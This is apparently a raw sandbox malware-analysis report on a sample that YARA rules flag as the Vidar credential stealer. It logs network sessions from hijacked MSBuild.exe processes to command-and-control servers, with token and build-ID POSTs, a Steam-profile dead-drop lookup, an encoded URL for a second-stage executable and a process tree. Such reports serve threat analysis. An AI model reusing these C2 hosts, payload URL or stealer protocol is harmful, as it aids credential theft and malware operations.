                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 41 66 36 64 6a 36 69 75 57 65 56 4e 30 33 4f 2f 76 58 76 38 41 4c 2f 50 2f 41 49 59 39 32 47 62 4a 56 46 43 33 75 32 74 38 2f 77 44 4c 2f 68 7a 32 66 56 43 44 66 36 49 51 63 67 33 6a 59 2f 38 41 41 65 61 76 50 66 47 66 2f 49 31 58 66 30 6a 2f 41 50 51 46 71 62 77 64 34 67 6d 75 62 76 53 74 43 76 63 6d 35 73 72 74 7a 47 33 58 4b 43 47 55 45 45 2b 78 49 48 30 2b 6c 51 2b 4d 76 2b 52 71 76 50 70 48 2f 77 43 67 4c 55 34 53 6a 4b 6a 69 34 77 6c 32 66 35 73 77 7a 53 74 47 74 67 4a 54 6a 33 58 35 49 77 61 4b 4b 4b 39 38 2b 50 43 69 69 69 67 44 51 38 4c 2f 41 50 49 39 36 4c 2f 32 33 2f 38 41 52 54 56 37 44 58 6a 33 68 66 38 41 35 48 76 52 66 2b 32 2f 2f 6f 70 71 39 49 38 53 32 2b 71 33 57 6e 4a 44 70 52 41 5a 70 50 33 77 38 30 78 6c 6b 77 65 41 77 47 52 7a 6a 4f
                                                                                                                                                                                                                    Data Ascii: Af6dj6iuWeVN03O/vXv8AL/P/AIY92GbJVFC3u2t8/wDL/hz2fVCDf6IQcg3jY/8AAeavPfGf/I1Xf0j/APQFqbwd4gmubvStCvcm5srtzG3XKCGUEE+xIH0+lQ+Mv+RqvPpH/wCgLU4SjKji4wl2f5swzStGtgJTj3X5IwaKKK98+PCiiigDQ8L/API96L/23/8ARTV7DXj3hf8A5HvRf+2//opq9I8S2+q3WnJDpRAZpP3w80xlkweAwGRzjO
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 62 69 31 43 58 51 53 5a 62 57 4e 41 6a 4b 6f 48 7a 4a 6c 67 2b 63 38 38 4c 77 65 70 72 4f 4f 59 55 4a 54 35 46 44 58 2f 68 76 38 7a 65 65 54 34 75 45 4f 64 31 64 4e 2b 75 31 6d 2b 2f 5a 47 6e 35 61 66 33 46 2f 4b 6c 41 43 39 41 42 39 4b 6f 57 74 78 4a 4f 38 66 6e 78 51 70 39 6d 76 58 4e 34 59 45 41 42 67 4d 5a 6b 7a 78 30 2f 31 55 6f 39 42 75 41 47 42 67 56 6e 32 47 74 54 53 36 56 44 71 78 74 62 63 33 41 30 31 72 6f 51 65 58 38 6d 39 37 32 53 4c 63 79 34 77 51 71 34 77 44 78 39 33 71 4f 4b 75 57 59 55 61 63 75 58 6b 73 39 76 36 39 53 49 35 50 69 61 31 4e 7a 39 70 65 4f 6e 66 58 2f 68 6a 6f 4b 4b 7a 57 31 43 57 53 47 4b 65 34 6a 74 66 50 52 62 79 4d 69 47 46 55 53 55 4c 61 50 4b 70 32 71 41 75 35 57 41 35 41 37 6a 50 61 71 6d 6b 61 68 4a 64 57 50 68 35 6d
                                                                                                                                                                                                                    Data Ascii: bi1CXQSZbWNAjKoHzJlg+c88LweprOOYUJT5FDX/hv8zeeT4uEOd1dN+u1m+/ZGn5af3F/KlAC9AB9KoWtxJO8fnxQp9mvXN4YEABgMZkzx0/1Uo9BuAGBgVn2GtTS6VDqxtbc3A01roQeX8m972SLcy4wQq4wDx93qOKuWYUacuXks9v69SI5Pia1Nz9peOnfX/hjoKKzW1CWSGKe4jtfPRbyMiGFUSULaPKp2qAu5WA5A7jPaqmkahJdWPh5m
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC16355OUTData Raw: 68 73 56 54 78 45 62 77 50 4d 78 75 58 31 73 48 4a 52 71 39 65 71 32 46 6f 70 4b 4b 36 6a 69 43 69 69 69 67 41 6f 70 31 6a 70 36 36 7a 34 68 30 33 53 70 5a 47 53 43 34 64 7a 4c 74 4f 43 56 56 64 32 50 78 78 58 6f 6e 2f 43 75 76 43 75 50 2b 51 58 6e 2f 74 34 6c 2f 77 44 69 71 38 54 46 5a 74 4b 6a 57 6c 53 68 43 2f 4c 75 32 37 64 4c 39 6e 33 50 72 4d 76 34 61 6f 34 6a 43 55 38 54 58 72 4f 50 50 64 70 4b 48 4e 6f 6d 34 36 74 7a 6a 31 54 30 31 50 4f 61 4b 39 48 2f 41 4f 46 64 65 46 66 2b 67 56 2f 35 4d 53 2f 2f 41 42 56 51 33 58 77 32 38 4e 79 77 4d 74 76 61 79 32 6b 33 38 4d 30 63 7a 6b 71 66 6f 78 49 72 6e 2f 74 75 72 2f 7a 36 58 2f 67 58 2f 77 42 71 64 6e 2b 71 6d 43 65 32 4a 6c 2f 34 4c 58 2f 79 78 2f 6b 65 66 55 55 74 33 61 33 65 6a 36 69 32 6d 36 6b 6f
                                                                                                                                                                                                                    Data Ascii: hsVTxEbwPMxuX1sHJRq9eq2FopKK6jiCiiigAop1jp66z4h03SpZGSC4dzLtOCVVd2PxxXon/CuvCuP+QXn/t4l/wDiq8TFZtKjWlShC/Lu27dL9n3PrMv4ao4jCU8TXrOPPdpKHNom46tzj1T01POaK9H/AOFdeFf+gV/5MS//ABVQ3Xw28NywMtvay2k38M0czkqfoxIrn/tur/z6X/gX/wBqdn+qmCe2Jl/4LX/yx/kefUUt3a3ej6i2m6ko
                                                                                                                                                                                                                    2024-10-03 13:15:07 UTC15932OUTData Raw: 4b 4b 4f 53 57 56 2f 75 70 47 68 5a 6d 37 38 41 63 6d 72 62 53 56 32 5a 4a 4e 75 79 45 72 70 76 43 6e 69 43 7a 30 4e 4c 73 58 53 54 4e 35 78 51 72 35 53 67 39 4d 35 7a 6b 6a 31 72 6d 32 6a 6c 53 37 2b 79 50 42 4d 6c 7a 2f 7a 77 61 4a 67 2f 72 39 30 6a 4e 52 43 56 47 6a 4d 69 6b 6d 4d 45 41 75 41 53 41 54 30 79 65 32 63 48 38 71 35 36 39 4f 6e 69 4b 66 4a 4a 36 65 52 32 34 53 74 58 77 64 58 32 6b 49 36 36 37 70 2f 38 41 39 4c 2f 41 4f 45 2b 30 6e 2f 6e 6a 65 66 39 2b 31 2f 2b 4b 70 50 2b 45 2b 30 6e 2f 6e 68 65 2f 77 44 66 74 66 38 41 34 71 76 4f 78 42 63 47 30 4e 32 4c 57 34 4e 71 4d 35 6e 45 4c 47 4d 59 4f 44 38 32 4d 64 66 65 68 49 70 5a 72 57 53 36 68 74 35 35 62 65 50 50 6d 54 52 78 4d 79 4a 67 5a 4f 57 41 77 4f 4b 34 50 37 4c 77 76 38 37 2b 39 66 35
                                                                                                                                                                                                                    Data Ascii: KKOSWV/upGhZm78AcmrbSV2ZJNuyErpvCniCz0NLsXSTN5xQr5Sg9M5zkj1rm2jlS7+yPBMlz/zwaJg/r90jNRCVGjMikmMEAuASAT0ye2cH8q569OniKfJJ6eR24StXwdX2kI667p/8A9L/AOE+0n/njef9+1/+KpP+E+0n/nhe/wDftf8A4qvOxBcG0N2LW4NqM5nELGMYOD82MdfehIpZrWS6ht55bePPmTRxMyJgZOWAwOK4P7Lwv87+9f5
2024-10-03 13:15:09 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:08 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 56258 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:09 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAK
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 49 49 44 42 4b 45 42 46 42 47 43 41 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 49 49 44 42 4b 45 42 46 42 47 43 41 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 49 49 44 42 4b 45 42 46 42 47 43 41 45 42 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------JEBGIIDBKEBFBGCAEBAKContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------JEBGIIDBKEBFBGCAEBAKContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------JEBGIIDBKEBFBGCAEBAKCont
2024-10-03 13:15:10 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:10 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:10 UTC99INData Raw: 35 38 0d 0a 4d 54 49 32 4e 7a 67 34 4f 58 78 6f 64 48 52 77 4f 69 38 76 63 47 78 68 65 57 51 75 61 47 56 68 62 48 52 6f 62 6d 78 70 5a 6d 55 75 63 47 73 76 62 47 52 74 63 79 39 68 4e 44 4d 30 4f 44 59 78 4d 6a 67 7a 4e 44 63 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 58MTI2Nzg4OXxodHRwOi8vcGxheWQuaGVhbHRobmxpZmUucGsvbGRtcy9hNDM0ODYxMjgzNDcuZXhlfDF8a2tra3w=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 56262 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:18 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----JDAFBKECAKFCAAAKJDAK
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 499
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-10-03 13:15:18 UTC499OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 35 33 65 38 31 33 64 39 33 35 30 66 62 35 64 35 32 65 65 37 37 38 62 36 37 34 66 34 39 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 46 42 4b 45 43 41 4b 46 43 41 41 41 4b 4a 44 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                    Data Ascii: ------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------JDAFBKECAKFCAAAKJDAKContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------JDAFBKECAKFCAAAKJDAKCont
2024-10-03 13:15:19 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:19 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 56263 | 104.102.49.254 | 443 | 5276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:19 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Host: steamcommunity.com
2024-10-03 13:15:19 UTC | 1870 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:19 GMT
                                                                                                                                                                                                                    Content-Length: 34837
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Set-Cookie: sessionid=917a177f0c4b073740d0fd9e; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                    2024-10-03 13:15:19 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-03 13:15:19 UTC | 16384 | IN
                                                                                                                                                                                                                    Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-03 13:15:19 UTC | 3768 | IN
                                                                                                                                                                                                                    Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-03 13:15:19 UTC | 171 | IN
                                                                                                                                                                                                                    Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 56266 | 172.67.166.76 | 443 | 5276 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:20 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                    Host: advocachark.store
2024-10-03 13:15:20 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                    Data Ascii: act=life
2024-10-03 13:15:21 UTC | 774 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:21 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=4dr3q26knitpk1i6jahu4rdd7g; expires=Mon, 27 Jan 2025 07:02:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tsf4WuhlPbFT0huJk%2By%2F5WwXyYeSiphRQZSktBdRmpQojxRP0qV2o052cfoXGxUFLCJrnAOWUIYV7tdxE6aMHXk0AzXH1yIg5Il4mIiJcgwDdJMi6Jo%2BMyynVmAUFHIPqP6DKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                    CF-RAY: 8ccd334f5a5f1809-EWR
2024-10-03 13:15:21 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                    Data Ascii: aerror #D12
2024-10-03 13:15:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 56265 | 49.12.197.9 | 443 | 3832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 13:15:20 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                    Host: 49.12.197.9
                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
2024-10-03 13:15:20 UTC | 331 | OUT
                                                                                                                                                                                                                    Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"b53e813d9350fb5d52ee778b674f49f5------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------HJJKFBGCFHCGDHIDAAECCont
2024-10-03 13:15:21 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Date: Thu, 03 Oct 2024 13:15:21 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    Connection: close
2024-10-03 13:15:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                    Imagebase:0x610000
                                                                                                                                                                                                                    File size:573'304 bytes
                                                                                                                                                                                                                    MD5 hash:C9784DB0C88A05A8AAE9DDB7289B51DB
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0xe0000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0x320000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0x730000
                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:09:14:06
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3636 -s 308
                                                                                                                                                                                                                    Imagebase:0xe0000
                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                    Start time:09:15:16
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\ProgramData\CBFCFBFBFB.exe
                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                    Commandline:"C:\ProgramData\CBFCFBFBFB.exe"
                                                                                                                                                                                                                    Imagebase:0xaf0000
                                                                                                                                                                                                                    File size:540'536 bytes
                                                                                                                                                                                                                    MD5 hash:49504D08DC10AECA7D36605D6A20BDE0
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                    Start time:09:15:16
                                                                                                                                                                                                                    Start date:03/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                    Imagebase:0x350000
                                                                                                                                                                                                                    File size:262'432 bytes
